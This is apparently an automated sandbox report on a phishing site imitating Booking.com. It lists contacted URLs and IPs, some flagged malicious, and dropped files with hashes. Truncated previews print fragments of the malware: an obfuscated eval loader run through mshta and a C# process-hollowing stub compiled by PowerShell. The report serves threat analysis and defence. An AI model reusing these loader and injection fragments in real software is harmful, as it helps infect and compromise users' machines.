                                                            https://partner.booking.com/themes/custom/booking/fonts/icons/icons.woff?v=1.3.3false
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            https://partner.booking.com/themes/custom/booking/images/favicons/favicon.icofalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            https://otelrules.svc.static.microsoft/rules/rule701751v1s19.xmlfalse
                                                              		high
                                                              https://otelrules.svc.static.microsoft/rules/rule120663v0s19.xmlfalse
                                                                		high
                                                                https://otelrules.svc.static.microsoft/rules/rule701301v1s19.xmlfalse
                                                                  		high
                                                                  https://otelrules.svc.static.microsoft/rules/rule702751v1s19.xmlfalse
                                                                    		high
                                                                    https://otelrules.svc.static.microsoft/rules/rule702301v1s19.xmlfalse
                                                                      		high
                                                                      https://otelrules.svc.static.microsoft/rules/rule120609v0s19.xmlfalse
                                                                        		high
                                                                        https://otelrules.svc.static.microsoft/rules/rule120627v0s19.xmlfalse
                                                                          		high
                                                                          https://otelrules.svc.static.microsoft/rules/rule703601v0s19.xmlfalse
                                                                            		high
                                                                            https://otelrules.svc.static.microsoft/rules/rule700751v1s19.xmlfalse
                                                                              		high
                                                                              https://otelrules.svc.static.microsoft/rules/rule700301v1s19.xmlfalse
                                                                                		high
                                                                                https://otelrules.svc.static.microsoft/rules/rule701550v1s19.xmlfalse
                                                                                  		high
                                                                                  https://otelrules.svc.static.microsoft/rules/rule700100v1s19.xmlfalse
                                                                                    		high
                                                                                    https://otelrules.svc.static.microsoft/rules/rule702550v1s19.xmlfalse
                                                                                      		high
                                                                                      https://otelrules.svc.static.microsoft/rules/rule700550v1s19.xmlfalse
                                                                                        		high
                                                                                        https://otelrules.svc.static.microsoft/rules/rule703400v0s19.xmlfalse
                                                                                          		high
                                                                                          https://otelrules.svc.static.microsoft/rules/rule700901v1s19.xmlfalse
                                                                                            		high
                                                                                            https://otelrules.svc.static.microsoft/rules/rule701100v1s19.xmlfalse
                                                                                              		high
                                                                                              http://92.255.85.2/a.mp4false
                                                                                                		high
                                                                                                https://booking.roombedsrewiews.com/static/OtAutoBlock.jsfalse
                                                                                                • Avira URL Cloud: safe
                                                                                                		unknown
                                                                                                https://otelrules.svc.static.microsoft/rules/rule700400v2s19.xmlfalse
                                                                                                  		high
                                                                                                  https://otelrules.svc.static.microsoft/rules/rule701901v1s19.xmlfalse
                                                                                                    		high
                                                                                                    https://otelrules.svc.static.microsoft/rules/rule120635v0s19.xmlfalse
                                                                                                      		high
                                                                                                      https://otelrules.svc.static.microsoft/rules/rule703850v0s19.xmlfalse
                                                                                                        		high
                                                                                                        https://otelrules.svc.static.microsoft/rules/rule702901v1s19.xmlfalse
                                                                                                          		high
                                                                                                          https://otelrules.svc.static.microsoft/rules/rule120612v0s19.xmlfalse
                                                                                                            		high
                                                                                                            https://otelrules.svc.static.microsoft/rules/rule703000v1s19.xmlfalse
                                                                                                              		high
                                                                                                              https://otelrules.svc.static.microsoft/rules/rule120681v0s19.xmlfalse
                                                                                                                		high
                                                                                                                https://otelrules.svc.static.microsoft/rules/rule120640v0s19.xmlfalse
                                                                                                                  		high
                                                                                                                  https://otelrules.svc.static.microsoft/rules/rule703450v1s19.xmlfalse
                                                                                                                    		high
                                                                                                                    https://otelrules.svc.static.microsoft/rules/rule700700v1s19.xmlfalse
                                                                                                                      		high
                                                                                                                      https://otelrules.svc.static.microsoft/rules/rule702000v1s19.xmlfalse
                                                                                                                        		high
                                                                                                                        https://otelrules.svc.static.microsoft/rules/rule702450v1s19.xmlfalse
                                                                                                                          		high
                                                                                                                          https://otelrules.svc.static.microsoft/rules/rule120617v0s19.xmlfalse
                                                                                                                            		high
                                                                                                                            https://otelrules.svc.static.microsoft/rules/rule703750v0s19.xmlfalse
                                                                                                                              		high
                                                                                                                              https://otelrules.svc.static.microsoft/rules/rule703300v0s19.xmlfalse
                                                                                                                                		high
                                                                                                                                https://otelrules.svc.static.microsoft/rules/rule700450v1s19.xmlfalse
                                                                                                                                  		high
                                                                                                                                  https://otelrules.svc.static.microsoft/rules/rule701700v1s19.xmlfalse
                                                                                                                                    		high
                                                                                                                                    https://otelrules.svc.static.microsoft/rules/rule702700v1s19.xmlfalse
                                                                                                                                      		high
                                                                                                                                      https://otelrules.svc.static.microsoft/rules/rule700851v1s19.xmlfalse
                                                                                                                                        		high
                                                                                                                                        https://otelrules.svc.static.microsoft/rules/rule703701v0s19.xmlfalse
                                                                                                                                          		high
                                                                                                                                          https://otelrules.svc.static.microsoft/rules/rule701851v1s19.xmlfalse
                                                                                                                                            		high
                                                                                                                                            https://otelrules.svc.static.microsoft/rules/rule702851v1s19.xmlfalse
                                                                                                                                              		high
                                                                                                                                              https://otelrules.svc.static.microsoft/rules/rule120619v0s19.xmlfalse
                                                                                                                                                		high
                                                                                                                                                https://otelrules.svc.static.microsoft/rules/rule700600v1s19.xmlfalse
                                                                                                                                                  		high
                                                                                                                                                  https://booking.roombedsrewiews.com/themes/custom/booking/fonts/icons/icons.woff?v=1.3.3false
                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                  		unknown
                                                                                                                                                  https://otelrules.svc.static.microsoft/rules/rule120625v0s19.xmlfalse
                                                                                                                                                    		high
                                                                                                                                                    https://otelrules.svc.static.microsoft/rules/rule120622v0s19.xmlfalse
                                                                                                                                                      		high
                                                                                                                                                      https://otelrules.svc.static.microsoft/rules/rule120653v0s19.xmlfalse
                                                                                                                                                        		high
                                                                                                                                                        https://otelrules.svc.static.microsoft/rules/rule702600v1s19.xmlfalse
                                                                                                                                                          		high
                                                                                                                                                          https://booking.roombedsrewiews.com/api?c=1false
                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                          		unknown
                                                                                                                                                          https://otelrules.svc.static.microsoft/rules/rule120647v0s19.xmlfalse
                                                                                                                                                            		high
                                                                                                                                                            https://otelrules.svc.static.microsoft/rules/rule224900v0s19.xmlfalse
                                                                                                                                                              		high
                                                                                                                                                              https://otelrules.svc.static.microsoft/rules/rule703100v1s19.xmlfalse
                                                                                                                                                                		high
                                                                                                                                                                https://otelrules.svc.static.microsoft/rules/rule120668v0s19.xmlfalse
                                                                                                                                                                  		high
                                                                                                                                                                  https://otelrules.svc.static.microsoft/rules/rule702100v1s19.xmlfalse
                                                                                                                                                                    		high
                                                                                                                                                                    https://siteintercept.qualtrics.com/dxjsmodule/5.76657644fe1b73dc4306.chunk.js?Q_CLIENTVERSION=2.27.0&Q_CLIENTTYPE=web&Q_BRANDID=partnersatbookingfalse
                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                    		unknown
                                                                                                                                                                    https://booking.roombedsrewiews.com/static/lazysizes.min.jsfalse
                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                    		unknown
                                                                                                                                                                    https://booking.roombedsrewiews.com/static/afalse
                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                    		unknown
                                                                                                                                                                    https://otelrules.svc.static.microsoft/rules/rule120620v0s19.xmlfalse
                                                                                                                                                                      		high
                                                                                                                                                                      https://partner.booking.com/themes/custom/booking/images/favicons/favicon.svgfalse
                                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                                      		unknown
                                                                                                                                                                      https://otelrules.svc.static.microsoft/rules/rule703351v0s19.xmlfalse
                                                                                                                                                                        		high
                                                                                                                                                                        https://otelrules.svc.static.microsoft/rules/rule120128v0s19.xmlfalse
                                                                                                                                                                          		high
                                                                                                                                                                          https://otelrules.svc.static.microsoft/rules/rule120650v0s19.xmlfalse
                                                                                                                                                                            		high
                                                                                                                                                                            https://otelrules.svc.static.microsoft/rules/rule703551v0s19.xmlfalse
                                                                                                                                                                              		high
                                                                                                                                                                              https://booking.roombedsrewiews.com/static/css_3iFMQAIstg4teIom2wVaOik81XAQ5V-7tH-iz2mq5to.cssfalse
                                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                                              		unknown
                                                                                                                                                                              https://otelrules.svc.static.microsoft/rules/rule703051v3s19.xmlfalse
                                                                                                                                                                                		high
                                                                                                                                                                                https://otelrules.svc.static.microsoft/rules/rule120661v0s19.xmlfalse
                                                                                                                                                                                  		high
                                                                                                                                                                                  http://roombedsrewiews.com/false
                                                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                                                  		unknown
                                                                                                                                                                                  https://otelrules.svc.static.microsoft/rules/rule120655v0s19.xmlfalse
                                                                                                                                                                                    		high
                                                                                                                                                                                    https://otelrules.svc.static.microsoft/rules/rule120614v0s19.xmlfalse
                                                                                                                                                                                      		high
                                                                                                                                                                                      https://otelrules.svc.static.microsoft/rules/other-Win32-v19.bundlefalse
                                                                                                                                                                                        		high
                                                                                                                                                                                        https://otelrules.svc.static.microsoft/rules/rule702350v1s19.xmlfalse
                                                                                                                                                                                          		high
                                                                                                                                                                                          https://otelrules.svc.static.microsoft/rules/rule120639v0s19.xmlfalse
                                                                                                                                                                                            		high
                                                                                                                                                                                            https://otelrules.svc.static.microsoft/rules/rule701050v1s19.xmlfalse
                                                                                                                                                                                              		high
                                                                                                                                                                                              https://otelrules.svc.static.microsoft/rules/rule704200v0s19.xmlfalse
                                                                                                                                                                                                		high
                                                                                                                                                                                                https://otelrules.svc.static.microsoft/rules/rule702200v1s19.xmlfalse
                                                                                                                                                                                                  		high
                                                                                                                                                                                                  https://otelrules.svc.static.microsoft/rules/rule704050v0s19.xmlfalse
                                                                                                                                                                                                    		high
                                                                                                                                                                                                    https://otelrules.svc.static.microsoft/rules/rule700350v1s19.xmlfalse
                                                                                                                                                                                                      		high
                                                                                                                                                                                                      https://otelrules.svc.static.microsoft/rules/rule120648v0s19.xmlfalse
                                                                                                                                                                                                        		high
                                                                                                                                                                                                        https://otelrules.svc.static.microsoft/rules/rule120657v0s19.xmlfalse
                                                                                                                                                                                                          		high
                                                                                                                                                                                                          https://otelrules.svc.static.microsoft/rules/rule702500v1s19.xmlfalse
                                                                                                                                                                                                            		high
                                                                                                                                                                                                            https://otelrules.svc.static.microsoft/rules/rule120660v0s19.xmlfalse
                                                                                                                                                                                                              		high
                                                                                                                                                                                                              https://otelrules.svc.static.microsoft/rules/rule703500v0s19.xmlfalse
                                                                                                                                                                                                                		high
                                                                                                                                                                                                                https://otelrules.svc.static.microsoft/rules/rule703950v0s19.xmlfalse
                                                                                                                                                                                                                  		high
                                                                                                                                                                                                                  https://otelrules.svc.static.microsoft/rules/rule700200v1s19.xmlfalse
                                                                                                                                                                                                                    		high
                                                                                                                                                                                                                    https://otelrules.svc.static.microsoft/rules/rule700500v1s19.xmlfalse
                                                                                                                                                                                                                      		high
                                                                                                                                                                                                                      https://otelrules.svc.static.microsoft/rules/rule701650v1s19.xmlfalse
                                                                                                                                                                                                                        		high

                                                                                                                                                                                                                        World Map of Contacted IPs

                                                                                                                                                                                                                        • No. of IPs < 25%
                                                                                                                                                                                                                        • 25% < No. of IPs < 50%
                                                                                                                                                                                                                        • 50% < No. of IPs < 75%
                                                                                                                                                                                                                        • 75% < No. of IPs

                                                                                                                                                                                                                        Public IPs

                                                                                                                                                                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                                        23.204.23.20
                                                                                                                                                                                                                        		unknownUnited States
                                                                                                                                                                                                                        		16625AKAMAI-ASUSfalse
                                                                                                                                                                                                                        172.67.207.52
                                                                                                                                                                                                                        		roombedsrewiews.comUnited States
                                                                                                                                                                                                                        		13335CLOUDFLARENETUStrue
                                                                                                                                                                                                                        104.17.209.240
                                                                                                                                                                                                                        		unknownUnited States
                                                                                                                                                                                                                        		13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                        142.251.32.99
                                                                                                                                                                                                                        		unknownUnited States
                                                                                                                                                                                                                        		15169GOOGLEUSfalse
                                                                                                                                                                                                                        142.250.64.68
                                                                                                                                                                                                                        		www.google.comUnited States
                                                                                                                                                                                                                        		15169GOOGLEUSfalse
                                                                                                                                                                                                                        172.253.122.84
                                                                                                                                                                                                                        		unknownUnited States
                                                                                                                                                                                                                        		15169GOOGLEUSfalse
                                                                                                                                                                                                                        18.164.96.110
                                                                                                                                                                                                                        		partner.booking.comUnited States
                                                                                                                                                                                                                        		3MIT-GATEWAYSUSfalse
                                                                                                                                                                                                                        142.251.40.131
                                                                                                                                                                                                                        		unknownUnited States
                                                                                                                                                                                                                        		15169GOOGLEUSfalse
                                                                                                                                                                                                                        208.95.112.1
                                                                                                                                                                                                                        		ip-api.comUnited States
                                                                                                                                                                                                                        		53334TUT-ASUSfalse
                                                                                                                                                                                                                        104.21.61.69
                                                                                                                                                                                                                        		booking.roombedsrewiews.comUnited States
                                                                                                                                                                                                                        		13335CLOUDFLARENETUStrue
                                                                                                                                                                                                                        23.204.6.193
                                                                                                                                                                                                                        		e10776.b.akamaiedge.netUnited States
                                                                                                                                                                                                                        		16625AKAMAI-ASUSfalse
                                                                                                                                                                                                                        134.213.193.62
                                                                                                                                                                                                                        		261-nrz-371.mktoresp.comIreland
                                                                                                                                                                                                                        		15395RACKSPACE-LONGBfalse
                                                                                                                                                                                                                        151.101.66.137
                                                                                                                                                                                                                        		code.jquery.comUnited States
                                                                                                                                                                                                                        		54113FASTLYUSfalse
                                                                                                                                                                                                                        142.251.35.168
                                                                                                                                                                                                                        		unknownUnited States
                                                                                                                                                                                                                        		15169GOOGLEUSfalse
                                                                                                                                                                                                                        172.64.80.1
                                                                                                                                                                                                                        		adult-hub1990.cfdUnited States
                                                                                                                                                                                                                        		13335CLOUDFLARENETUStrue
                                                                                                                                                                                                                        35.190.80.1
                                                                                                                                                                                                                        		a.nel.cloudflare.comUnited States
                                                                                                                                                                                                                        		15169GOOGLEUSfalse
                                                                                                                                                                                                                        92.255.85.2
                                                                                                                                                                                                                        		unknownRussian Federation
                                                                                                                                                                                                                        		42097SOVTEL-ASRUtrue
                                                                                                                                                                                                                        142.250.176.195
                                                                                                                                                                                                                        		unknownUnited States
                                                                                                                                                                                                                        		15169GOOGLEUSfalse
                                                                                                                                                                                                                        104.17.208.240
                                                                                                                                                                                                                        		prodlb.siteintercept.qualtrics.com.cdn.cloudflare.netUnited States
                                                                                                                                                                                                                        		13335CLOUDFLARENETUSfalse

                                                                                                                                                                                                                        Private

                                                                                                                                                                                                                        IP
                                                                                                                                                                                                                        192.168.2.17
                                                                                                                                                                                                                        192.168.2.23
                                                                                                                                                                                                                        127.0.0.1

                                                                                                                                                                                                                        General Information

                                                                                                                                                                                                                        Joe Sandbox version:42.0.0 Malachite
                                                                                                                                                                                                                        Analysis ID:1651034
                                                                                                                                                                                                                        Start date and time:2025-03-28 11:26:20 +01:00
                                                                                                                                                                                                                        Joe Sandbox product:CloudBasic
                                                                                                                                                                                                                        Overall analysis duration:
                                                                                                                                                                                                                        Hypervisor based Inspection enabled:false
                                                                                                                                                                                                                        Report type:full
                                                                                                                                                                                                                        Cookbook file name:defaultwindowsinteractivecookbook.jbs
                                                                                                                                                                                                                        Sample URL:http://roombedsrewiews.com
                                                                                                                                                                                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 134, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                                        Number of analysed new started processes analysed:23
                                                                                                                                                                                                                        Number of new started drivers analysed:0
                                                                                                                                                                                                                        Number of existing processes analysed:0
                                                                                                                                                                                                                        Number of existing drivers analysed:0
                                                                                                                                                                                                                        Number of injected processes analysed:0
                                                                                                                                                                                                                        Technologies:
                                                                                                                                                                                                                        • EGA enabled
                                                                                                                                                                                                                        Analysis Mode:stream
                                                                                                                                                                                                                        Analysis stop reason:Timeout
                                                                                                                                                                                                                        Detection:MAL
                                                                                                                                                                                                                        Classification:mal100.phis.expl.evad.win@33/22@29/137
                                                                                                                                                                                                                        • Exclude process from analysis (whitelisted): SIHClient.exe, svchost.exe
                                                                                                                                                                                                                        • Excluded IPs from analysis (whitelisted): 142.251.40.142, 142.251.32.99, 172.253.122.84, 142.251.32.110, 4.175.87.197
                                                                                                                                                                                                                        • Excluded domains from analysis (whitelisted): clients2.google.com, accounts.google.com, redirector.gvt1.com, slscr.update.microsoft.com, clientservices.googleapis.com, clients.l.google.com
                                                                                                                                                                                                                        • HTTPS sessions have been limited to 150. Please view the PCAPs for the complete data.
                                                                                                                                                                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                                        • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                                                                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                                        • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                                                                                                                                        • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                                                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                                                        • VT rate limit hit for: http://roombedsrewiews.com

                                                                                                                                                                                                                        Created / dropped Files

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\5IQBCSP1\rq3xYUErWsFPbHiX[1].htm

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Windows\System32\mshta.exe
                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):10440
                                                                                                                                                                                                                        Entropy (8bit):6.124440030336735
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:
                                                                                                                                                                                                                        MD5:4069403CCA2F004EBEAB52791A33BADC
                                                                                                                                                                                                                        SHA1:10721205C95806F9CA3FDDCE4697BDEAF7393D9D
                                                                                                                                                                                                                        SHA-256:DFA6CB6EE7B35026D87257216E75298774E172E736792557F9752B783CA335F6
                                                                                                                                                                                                                        SHA-512:D1FAA5904632133D9A78C1D3E0080F42E63450C3BDC4789A9CB24B868F0AC0F04082A1D076ADFBC64D42EE29C97ECC07B321DDC731C4FD8B740ED74FFAEEE4B9
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        Preview:<html><head><meta http-equiv='x-ua-compatible' content='EmulateIE9'><META NAME='GENERATOR' Content='The source code of this page is encrypted with HTML Guardian, the world's standart for website protection. Visit http://www.protware.com for details'><meta http-equiv='expires' content=''><script>l1l=document.documentMode||document.all;var ca8b5d9=true;ll1=document.layers;lll=window.sidebar;ca8b5d9=(!(l1l&&ll1)&&!(!l1l&&!ll1&&!lll));l_ll=location+'';l11=navigator.userAgent.toLowerCase();function lI1(l1I){return l11.indexOf(l1I)>0?true:false};lII=lI1('kht')|lI1('per');ca8b5d9|=lII;zLP=location.protocol+'0FD';k0d5fl84Q=new Array();tUAXr0xey=new Array();tUAXr0xey[0]='vdMF%32%38%32q';k0d5fl84Q[0]='.<.h.t.m.l.>.\r.\n~za.e.a.d.>.<.s.c.r.i.p.t.>.e.v.a.l.(.u.n.e~..a.p.e.(.\'.\\.1.6.6.a.r.%.2.0.%.7.1~#~-.%.3.7~1.D~)~3.2~3.3.B~,.1~,.9~1.8~4~#.2.3.t~(.6~?.6.E~#.4~7~K.1.4.6~,.2~#.5.7.m~#.0.3.h~L.1.r~Y.3.%.6.F~L.4.e~)~A.3~=.3~a.2.C~1~k~+.2~?~:~b.6.o~(.2~A~H~4~1~+~:.i~1~o.3.2~~~p~@~1.B}..2~;}.~)~?.7~

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):15908
                                                                                                                                                                                                                        Entropy (8bit):5.422430575114955
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:
                                                                                                                                                                                                                        MD5:B1B01D592117C6A8CE8460205A3F6981
                                                                                                                                                                                                                        SHA1:8B7882C1E95610812D591B90863059B2F2E2C152
                                                                                                                                                                                                                        SHA-256:7D7EF79B8EF7DBB95ECBCC7D1F75A3A8B41778679DC2782AFCE228DE75AF4597
                                                                                                                                                                                                                        SHA-512:A24E4DF1045EBF0F02FE632F1219BC895BC07009EC8DEC5F93EFBB9DB0810C7C52C815C870DE90DD1EBBC3B06C47E9B396ABC02F0DA26F3E4543D0D74E5D9A90
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        Preview:@...e...........s....................................@..........H...............o..b~.D.poM...%..... .Microsoft.PowerShell.ConsoleHostD...............4..7..D.#V.....B.......System.Management.Automation0.................Vn.F..kLsw..........System..4...............<."..Ke@...j..........System.Core.L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.4.................%...K... ...........System.Xml..@................z.U..G...5.f.1........System.DirectoryServices<................t.,.lG....M...........System.Management...4...............&.QiA0aN.:... .G........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<................$@...J....M+.B........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Commands.Utility...D....................+.H..!...e........System.Configuration.Ins

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\CSC8B1832D39C30407296B9DAA42FAFADD.TMP

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                                                                                        File Type:MSVC .res
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):652
                                                                                                                                                                                                                        Entropy (8bit):3.0948299029066915
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:
                                                                                                                                                                                                                        MD5:F49C888C75E2471B5848EF9F9943ACE1
                                                                                                                                                                                                                        SHA1:AB986427F35C25FE941D34B670B666DBE2CAF0BC
                                                                                                                                                                                                                        SHA-256:6693C2CA10D8BDBA6E3FE435519586020311DE552B3ADD12A1A1D13AC108BFFD
                                                                                                                                                                                                                        SHA-512:31FD07DF3690BFCFFC69E2EEE20BD52B54D9266C94CD3F58D2A8D30EFC706565F4973FE5B0772B591040E6B62844FF326BB5887E376C7D84CD517A94A682E186
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...t.o.a.u.d.q.q.y...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...t.o.a.u.d.q.q.y...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\RES189A.tmp

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                                                                                                                        File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x482, 9 symbols, created Fri Mar 28 11:44:21 2025, 1st section name ".debug$S"
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):1320
                                                                                                                                                                                                                        Entropy (8bit):3.9732801196501164
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:
                                                                                                                                                                                                                        MD5:AAC65609458C3DDDC10EC7B5D6A08301
                                                                                                                                                                                                                        SHA1:961F6F392D57DB1BBB1EA39A12855FD13F50A703
                                                                                                                                                                                                                        SHA-256:1177A5DB670EA2C685BCDC693BE05062CEE66897DE001545FF097268D2C1EFC3
                                                                                                                                                                                                                        SHA-512:E7D10A01D79CFBACC1DB5A976226E8ABE8B7F51EA5A46872B8F2AE98F3A1F225A06DAA04774A9CA4A9757E639F362C91A867764D6F74439A33638156D02C8C48
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        Preview:L......g.............debug$S........D...................@..B.rsrc$01........X.......(...........@..@.rsrc$02........P...2...............@..@........K....c:\Users\user\AppData\Local\Temp\CSC8B1832D39C30407296B9DAA42FAFADD.TMP....................u.G.XH.C............5.......C:\Users\user\AppData\Local\Temp\RES189A.tmp.-.<....................a..Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe...............................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...t.o.a.u.d.q.q.y...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_q0t4bk5d.t2n.psm1

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):60
                                                                                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:
                                                                                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\toaudqqy.0.cs

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                        File Type:C++ source, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):9122
                                                                                                                                                                                                                        Entropy (8bit):4.613031027327575
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:
                                                                                                                                                                                                                        MD5:58B10EF6BA0DA88788F1AAC56CE7E2DB
                                                                                                                                                                                                                        SHA1:48221936B98AAC14EAD7C4589513D074365414EC
                                                                                                                                                                                                                        SHA-256:AE11144F426028E50E77D64A66AEB954E169F627F8ABFE403791032594834520
                                                                                                                                                                                                                        SHA-512:19C28B5AF8E4243350EE13C423FD066CEF969A5C86DE5F7B2AC4E4FBF75FDA17E82A6A91FBD6034786B9BEEE77E2EB4B1CECD1CF0B901E2874B88DA3E338845E
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        Preview:.using System.Diagnostics;..using System.Runtime.InteropServices;..using System;....namespace Stub..{.. public static class Look.. {.. #region API delegate.. private delegate int ResumeThreadHandler(IntPtr handle);.. private delegate bool SetWowThreadContextHandler(IntPtr thread, int[] context);.. private delegate bool SetThreadContextHandler(IntPtr thread, int[] context);.. private delegate bool GetWowThreadContextHandler(IntPtr thread, int[] context);.. private delegate bool GetThreadContextHandler(IntPtr thread, int[] context);.. private delegate int VirtualAllocExHandler(IntPtr handle, int address, int length, int type, int protect);.. private delegate bool WriteMemoryHandler(IntPtr process, int baseAddress, byte[] buffer, int bufferSize, ref int bytesWritten);.. private delegate bool ReadMemoryHandler(IntPtr process, int baseAddress, ref int buffer, int bufferSize, ref int bytesRead);.. private delegate

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\toaudqqy.cmdline

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                        File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):188
                                                                                                                                                                                                                        Entropy (8bit):4.889540526675411
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:
                                                                                                                                                                                                                        MD5:93810766A0174826610F30F1054A0FA5
